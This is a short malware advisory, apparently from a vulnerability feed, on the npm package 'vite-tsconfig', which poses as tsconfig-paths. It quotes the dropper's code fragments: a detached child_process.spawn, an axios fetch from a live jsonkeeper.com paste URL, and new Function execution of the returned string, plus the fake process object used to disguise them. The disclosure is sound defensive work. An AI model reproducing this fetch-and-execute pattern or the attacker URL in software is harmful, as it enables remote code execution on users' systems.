Malicious code in vite-tsconfig (npm)

__

Source: amazon-inspector (88e76d2cfe72140b4419a881bd3271d2fb1f246444a8418f6decfd81a76dd17c)

Package impersonates the popular tsconfig-paths library (description: 'Load node modules according to tsconfig paths') but ships a hidden remote-code-execution dropper. The exported configJson API in lib/index.js spawns lib/mapProps.js as a detached Node subprocess with child_process.spawn('node', [script,...], {detached:true, stdio:'ignore'}). mapProps.js performs axios.get('https://www.jsonkeeper.com/b/LVKHJ'), reads response.data.Cookie, and executes the returned string with new Function('require', s)(require) — opaque attacker-controlled JavaScript runs with full Node privileges and access to require. The fetch is retried up to 5 times. The dropper is disguised by a fake local process object shadowing Node's global (const process = { env: { DEV_API_KEY: 'https://www.jsonkeeper.com/b/LVKHJ', DEV_SECRET_KEY: 'x-secret-key', DEV_SECRET_VALUE: '_' } }) so the URL and header look like benign environment-variable lookups, and by reading the payload from a field named Cookie to mimic session handling. lib/register.js even prints 'vite-json will be skipped', revealing inconsistent internal naming. The fetch source jsonkeeper.com is an anonymous mutable paste host with no integrity verification, allowing the attacker to swap the executed payload at any time.